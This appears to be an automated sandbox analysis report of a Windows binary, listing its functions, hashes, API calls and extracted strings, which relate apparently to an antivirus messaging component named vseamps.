                                                                                                                • String ID: -
                                                                                                                • API String ID: 0-2547889144
                                                                                                                • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                                                                                • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                                                                                                • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                                                                                • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                                                                                                Function 000000014000CC00 Relevance: .1, Instructions: 89COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                                                                                • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                                                                                                • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                                                                                • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                                                                                                Function 000000014000C2A0 Relevance: .1, Instructions: 89COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                                                                                • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                                                                                                • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                                                                                • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                                                                                                Function 00000001400110F0 Relevance: .1, Instructions: 78COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                                                                                • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                                                                                                • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                                                                                • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                                                                                                Function 00007FFBC320FD40 Relevance: .0, Instructions: 32COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105666741.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105649866.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105684868.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105702675.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105718261.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_7ffbc3200000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                                                                                • Instruction ID: 3ebcd1e3d86842839c1dba410951551620a7be1127b368d727b69c627f5226d5
                                                                                                                • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                                                                                • Instruction Fuzzy Hash: 68F062B1B192958AEFA49F38E942E2A77D4E748380F988039D68D87B04D63C94608F04
                                                                                                                Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239timeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 346 1400038d0-140003915 SetWaitableTimer 347 140003925-140003947 346->347 348 140003917-140003924 346->348 349 140003949-140003969 #4 347->349 350 140003970-14000397a 347->350 349->350 351 140003992-1400039d3 EnterCriticalSection LeaveCriticalSection WaitForMultipleObjects 350->351 352 14000397c-14000398d #4 350->352 353 140003d32 351->353 354 1400039d9-1400039f1 351->354 352->351 357 140003d35-140003d49 353->357 355 1400039f3-140003a04 #4 354->355 356 140003a09-140003a1a EnterCriticalSection 354->356 355->356 358 140003a67 356->358 359 140003a1c-140003a34 356->359 362 140003a6c-140003a8e LeaveCriticalSection 358->362 360 140003a36 359->360 361 140003a3e-140003a49 359->361 360->361 361->362 365 140003a4b-140003a65 SetEvent ResetEvent 361->365 363 140003ab4-140003abe 362->363 364 140003a90-140003aad #4 362->364 366 140003ae8-140003af9 363->366 367 140003ac0-140003ae1 #4 363->367 364->363 365->362 368 140003afb-140003b26 #4 366->368 369 140003b2d-140003b37 366->369 367->366 368->369 370 140003b61-140003b6b 369->370 371 140003b39-140003b5a #4 369->371 372 140003b6d-140003b98 #4 370->372 373 140003b9f-140003ba9 370->373 371->370 372->373 374 140003bab-140003bd6 #4 373->374 375 140003bdd-140003be7 373->375 374->375 376 140003be9-140003c14 #4 375->376 377 140003c1b-140003c25 375->377 376->377 378 140003c27-140003c48 #4 377->378 379 140003c4f-140003c59 377->379 378->379 380 140003c83-140003c8d 379->380 381 140003c5b-140003c7c #4 379->381 382 140003cb7-140003cc1 380->382 383 140003c8f-140003cb0 #4 380->383 381->380 384 140003cc3-140003ce4 #4 382->384 385 140003ceb-140003cf5 382->385 383->382 384->385 386 140003d11-140003d14 385->386 387 140003cf7-140003d0c #4 385->387 388 140003d17 call 140001750 386->388 387->386 389 140003d1c-140003d1f 388->389 390 140003d21-140003d29 call 140002650 389->390 391 140003d2e-140003d30 389->391 390->391 391->357
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                                                                                                • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                                                                                                • API String ID: 1021822269-3147033232
                                                                                                                • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                                                                                • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                                                                                                • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                                                                                • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350
                                                                                                                Function 0000000140001010 Relevance: 38.6, APIs: 12, Strings: 10, Instructions: 89libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                                                                                                • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                                                                                                • API String ID: 883923345-381368982
                                                                                                                • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                                                                                • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                                                                                                • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                                                                                • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                                                                                                Function 0000000140002460 Relevance: 30.1, APIs: 20, Instructions: 110memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 1613947383-0
                                                                                                                • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                                                                                • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                                                                                                • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                                                                                • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                                                                                                Function 0000000140004500 Relevance: 22.6, APIs: 15, Instructions: 73memoryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1995290849-0
                                                                                                                • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                                                                                • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                                                                                                • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                                                                                • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                                                                                                Function 00000001400048A0 Relevance: 22.6, APIs: 15, Instructions: 65memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1995290849-0
                                                                                                                • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                                                                                • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                                                                                                • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                                                                                • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                                                                                                Function 0000000140002DE0 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 166registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                                                                                                • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                                                                                • API String ID: 93015348-1041928032
                                                                                                                • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                                                                                • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                                                                                                • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                                                                                • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                                                                                                Function 0000000140002B40 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 141libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                                                                                                • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                                                                                                • API String ID: 3682727354-300733478
                                                                                                                • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                                                                                • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                                                                                                • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                                                                                • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                                                                                                Function 00000001400033E0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 126memorytimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                                                                                                • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                                                                                                • API String ID: 2587151837-1427723692
                                                                                                                • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                                                                                • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                                                                                                • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                                                                                • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                                                                                                Function 0000000140004D10 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                                                                                                • String ID: SetDllDirectoryW$kernel32.dll
                                                                                                                • API String ID: 3184163350-3826188083
                                                                                                                • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                                                                                • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                                                                                                • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                                                                                • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                                                                                                Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocProcesslstrlen
                                                                                                                • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                                                                                • API String ID: 3424473247-996641649
                                                                                                                • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                                                                                • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                                                                                                • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                                                                                • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                                                                                                Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$ByteCharMultiWide$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1775797328-0
                                                                                                                • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                                                                                • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                                                                                                • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                                                                                • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                                                                                                Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                                                                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                                                                                                • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                                                                                                • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                                                                                                • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2105575183.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2105554463.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105596510.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105615443.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2105631155.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_140000000_l0tiFM.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 1232609184-0
